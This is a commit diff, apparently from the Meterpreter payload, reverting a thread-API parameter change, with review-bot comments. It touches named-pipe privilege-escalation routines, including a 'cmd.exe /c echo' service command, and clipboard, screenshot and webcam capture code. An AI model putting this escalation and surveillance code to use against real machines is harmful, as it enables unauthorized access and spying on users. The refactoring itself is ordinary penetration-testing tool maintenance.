
Revert "Add a fourth parameter to the thread API"

This reverts commit 0afe17d160.
Spencer McIntyre 2020-08-19 11:48:16 -04:00
parent cf4614c941
commit ee69b4f274
14 changed files with 56 additions and 44 deletions


@ -69,7 +69,7 @@ typedef struct _ThreadApi
BOOL(*kill)(THREAD* thread);
BOOL(*run)(THREAD* thread);
BOOL(*sigterm)(THREAD* thread);
THREAD*(*create)(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3, LPVOID param4);
THREAD*(*create)(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3);
THREAD*(*open)();
HANDLE(*create_remote)(HANDLE hProcess, SIZE_T sStackSize, LPVOID pvStartAddress, LPVOID pvStartParam, DWORD dwCreateFlags, LPDWORD pdwThreadId);
HANDLE(*update_token)( Remote *remote, HANDLE token );


@ -25,7 +25,6 @@ struct _THREAD
LPVOID parameter1;
LPVOID parameter2;
LPVOID parameter3;
LPVOID parameter4;
};


@ -1230,7 +1230,7 @@ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet)
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to allocate memory for clipboard events", ERROR_NOT_ENOUGH_MEMORY);
}
pState->hThread = met_api->thread.create((THREADFUNK)clipboard_monitor_thread_func, pState, NULL, NULL, NULL);
pState->hThread = met_api->thread.create((THREADFUNK)clipboard_monitor_thread_func, pState, NULL, NULL);
if (pState->hThread == NULL)
{


@ -34,10 +34,9 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
HANDLE hPipe = NULL;
HANDLE hSem = NULL;
char * cpPipeName = NULL;
Remote * remote = NULL;
BYTE bMessage[128] = {0};
DWORD dwBytes = 0;
PostImpersonationCallback fPostImpersonation = NULL;
PPRIV_POST_IMPERSONATION pPostImpersonation = NULL;
do {
if (!thread) {
@ -45,11 +44,10 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
}
cpPipeName = (char *)thread->parameter1;
remote = (Remote *)thread->parameter2;
hSem = (HANDLE)thread->parameter3;
fPostImpersonation = (PostImpersonationCallback)thread->parameter4;
hSem = (HANDLE)thread->parameter2;
pPostImpersonation = (PPRIV_POST_IMPERSONATION)thread->parameter3;
if (!cpPipeName || !remote) {
if (!cpPipeName) {
BREAK_WITH_ERROR("[ELEVATE] elevate_namedpipe_thread. invalid thread arguments",
ERROR_BAD_ARGUMENTS);
}
@ -96,8 +94,8 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed");
}
if (fPostImpersonation) {
dwResult = fPostImpersonation(remote);
if (pPostImpersonation) {
dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam);
if (dwResult != ERROR_SUCCESS) {
RevertToSelf();
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
@ -128,13 +126,14 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
*/
DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
{
DWORD dwResult = ERROR_SUCCESS;
char * cpServiceName = NULL;
THREAD * pThread = NULL;
HANDLE hSem = NULL;
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
OSVERSIONINFO os = {0};
DWORD dwResult = ERROR_SUCCESS;
char * cpServiceName = NULL;
THREAD * pThread = NULL;
HANDLE hSem = NULL;
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
OSVERSIONINFO os = {0};
PRIV_POST_IMPERSONATION PostImpersonation;
do {
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
@ -162,7 +161,10 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
"cmd.exe /c echo %s > %s", cpServiceName, cServicePipe);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, remote, hSem, post_callback_use_self);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe. met_api->thread.create failed",
ERROR_INVALID_HANDLE);
@ -235,20 +237,21 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
*/
DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
{
DWORD dwResult = ERROR_SUCCESS;
THREAD * pThread = NULL;
HANDLE hServiceFile = NULL;
HANDLE hSem = NULL;
LPVOID lpServiceBuffer = NULL;
char * cpServiceName = NULL;
THREAD * pthread = NULL;
char cServicePath[MAX_PATH] = {0};
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
char cTempPath[MAX_PATH] = {0};
DWORD dwBytes = 0;
DWORD dwTotal = 0;
DWORD dwServiceLength = 0;
DWORD dwResult = ERROR_SUCCESS;
THREAD * pThread = NULL;
HANDLE hServiceFile = NULL;
HANDLE hSem = NULL;
LPVOID lpServiceBuffer = NULL;
char * cpServiceName = NULL;
THREAD * pthread = NULL;
char cServicePath[MAX_PATH] = {0};
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
char cTempPath[MAX_PATH] = {0};
DWORD dwBytes = 0;
DWORD dwTotal = 0;
DWORD dwServiceLength = 0;
PRIV_POST_IMPERSONATION PostImpersonation;
do
{
@ -298,7 +301,10 @@ DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
}
hSem = CreateSemaphore(NULL, 0, 1, NULL);
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, remote, hSem, post_callback_use_self);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe2. met_api->thread.create failed",
ERROR_INVALID_HANDLE);
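Review bot: In elevate_namedpipe_thread the guard `if (pPostImpersonation)` tests only the struct pointer, so a caller that hands over a PRIV_POST_IMPERSONATION with an unset pCallback would call through a NULL function pointer while still impersonating the pipe client; `if (pPostImpersonation && pPostImpersonation->pCallback)` closes that gap at no cost. The three call sites in this commit all assign pCallback, so this is defensive rather than a live bug. Note also that PostImpersonation lives on the caller's stack and is passed by address through thread.create, exactly as `&cServicePipe` already is, and nothing inside the hunk shows the thread being joined or killed before elevate_via_service_namedpipe returns — worth confirming in the part of the function outside the hunk and recording next to the declaration with a comment such as `// passed to pThread by pointer; must outlive the thread`. elevate_namedpipe_thread begins before the hunk and both elevate_via_service_namedpipe variants continue past it.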


@ -6,4 +6,9 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD* thread);
DWORD elevate_via_service_namedpipe(Remote* remote, Packet* packet);
DWORD elevate_via_service_namedpipe2(Remote* remote, Packet* packet);
typedef struct _PRIV_POST_IMPERSONATION {
PostImpersonationCallback pCallback;
PVOID pCallbackParam;
} PRIV_POST_IMPERSONATION, * PPRIV_POST_IMPERSONATION;
#endif
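Review bot: The new PRIV_POST_IMPERSONATION typedef carries no comment saying what it bundles or who owns it; elevate.c passes one through thread.create as parameter3 and elevate_namedpipe_thread calls `pCallback(pCallbackParam)` only after ImpersonateNamedPipeClient succeeds, reverting on failure. A comment above the struct such as `// Callback invoked once the named-pipe client has been impersonated; pCallbackParam is passed through unchanged. Caller-owned and must stay valid until the pipe thread finishes.` would make that contract visible to the next caller. The PostImpersonationCallback type it references is not in the hunk and is presumably declared earlier in this header.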


@ -298,6 +298,7 @@ DWORD elevate_via_service_namedpipe_rpcss(Remote* remote, Packet* packet)
OSVERSIONINFO os = { 0 };
HANDLE hPipe = NULL;
DWORD dwPipeUid[2] = { 0, 0 };
PRIV_POST_IMPERSONATION PostImpersonation;
do {
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
@ -323,7 +324,9 @@ DWORD elevate_via_service_namedpipe_rpcss(Remote* remote, Packet* packet)
dprintf("[ELEVATE] elevate_via_service_namedpipe_rpcss. using pipename: %s", cPipeName1);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
pThread = met_api->thread.create(elevate_namedpipe_thread, &cPipeName1, remote, hSem, post_callback_use_rpcss);
PostImpersonation.pCallback = post_callback_use_rpcss;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cPipeName1, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe_rpcss. met_api->thread.create failed", ERROR_INVALID_HANDLE);
}


@ -456,7 +456,7 @@ DWORD request_ui_desktop_screenshot(Remote * remote, Packet * request)
dprintf("[UI] desktop_screenshot. dwCurrentSessionId=%d, dwActiveSessionId=%d, cCommandLine=%s\n", dwCurrentSessionId, dwActiveSessionId, cCommandLine);
// start a thread to create a named pipe server and wait for a client to connect an send back the JPEG screenshot.
pPipeThread = met_api->thread.create(desktop_screenshot_thread, &cNamedPipe, response, NULL, NULL);
pPipeThread = met_api->thread.create(desktop_screenshot_thread, &cNamedPipe, response, NULL);
if (!pPipeThread)
{
BREAK_WITH_ERROR("[UI] desktop_screenshot. met_api->thread.create failed", ERROR_INVALID_HANDLE);


@ -668,7 +668,7 @@ extern "C" {
// kick off the worker thread that will do all the cam handling on one thread to avoid
// cross-threaded COM problems.
g_pWorkerThread = met_api->thread.create(webcam_control_thread, g_pThreadState, NULL, NULL, NULL);
g_pWorkerThread = met_api->thread.create(webcam_control_thread, g_pThreadState, NULL, NULL);
if (g_pWorkerThread == NULL) {
BREAK_WITH_ERROR("[WEBCAM] Failed to create thread.", ERROR_THREAD_1_INACTIVE);


@ -488,7 +488,7 @@ BOOL command_handle(Remote *remote, Packet *packet)
*commands = baseCommand;
*(commands + 1) = extensionCommand;
cpt = thread_create(command_process_thread, remote, packet, commands, NULL);
cpt = thread_create(command_process_thread, remote, packet, commands);
if (cpt)
{
dprintf("[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle);


@ -18,7 +18,7 @@ DWORD THREADCALL pivot_packet_dispatch_thread(THREAD* thread)
DWORD pivot_packet_dispatch(PivotContext* pivotCtx, LPBYTE packetBuffer, DWORD packetSize)
{
THREAD* thread = thread_create(pivot_packet_dispatch_thread, pivotCtx, packetBuffer, (LPVOID)(DWORD_PTR)packetSize, NULL);
THREAD* thread = thread_create(pivot_packet_dispatch_thread, pivotCtx, packetBuffer, (LPVOID)(DWORD_PTR)packetSize);
if (thread)
{
dprintf("[PIVOTPACKET] Dispatching packet on new thread %p", thread);


@ -150,7 +150,7 @@ DWORD scheduler_insert_waitable( HANDLE waitable, LPVOID entryContext, LPVOID th
entry->pause = event_create();
entry->resume = event_create();
swt = thread_create( scheduler_waitable_thread, entry, threadContext, NULL, NULL );
swt = thread_create( scheduler_waitable_thread, entry, threadContext, NULL );
if( swt != NULL )
{
dprintf( "[SCHEDULER] created scheduler_waitable_thread 0x%08X", swt );


@ -675,7 +675,7 @@ static void transport_reset_tcp(Transport* transport, BOOL shuttingDown)
// before cleaning up the socket. This is done in another thread so that functionality
// can continue.
dprintf("[TCP] It should now be safe to close the socket.");
THREAD* t = thread_create(cleanup_socket, (LPVOID)ctx->fd, NULL, NULL, NULL);
THREAD* t = thread_create(cleanup_socket, (LPVOID)ctx->fd, NULL, NULL);
thread_run(t);
}
}
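Review bot: `thread_run(t);` on the line after the updated thread_create call is still executed without checking for NULL, while every other thread.create / thread_create site touched by this commit tests the result before using it (`if (!pThread)` in elevate.c, `if (swt != NULL)` in the scheduler, `if (cpt)` in command_handle). Whether thread_run tolerates a NULL THREAD is not visible here, so the safe form is `if (t) thread_run(t);` or the dprintf-on-failure pattern the other sites use. The enclosing transport_reset_tcp starts before the hunk.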


@ -204,7 +204,7 @@ static ULONG THREADCALL thread_preamble(THREAD* thread)
/*
* Create a new thread in a suspended state.
*/
THREAD* thread_create(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3, LPVOID param4)
THREAD* thread_create(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3)
{
THREAD* thread = NULL;
@ -231,7 +231,6 @@ THREAD* thread_create(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID para
thread->parameter1 = param1;
thread->parameter2 = param2;
thread->parameter3 = param3;
thread->parameter4 = param4;
thread->funk = funk;
thread->handle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread_preamble, thread, CREATE_SUSPENDED, &thread->id);
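Review bot: The header comment `Create a new thread in a suspended state.` does not say what happens to param1..param3 or how the thread is eventually started, although the body stores them into thread->parameter1..3 for the thread function and calls CreateThread with CREATE_SUSPENDED, with callers such as transport_reset_tcp starting it via thread_run. Suggest extending it to `Create a new thread in a suspended state. param1..param3 are stored in the THREAD for the thread function; the caller starts it with thread_run.` The function continues past the hunk, where the CreateThread result is presumably checked.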


@ -50,7 +50,7 @@ BOOL event_poll( EVENT * event, DWORD timeout );
THREAD * thread_open( VOID );
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3, LPVOID param4 );
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3 );
void disable_thread_error_reporting(void);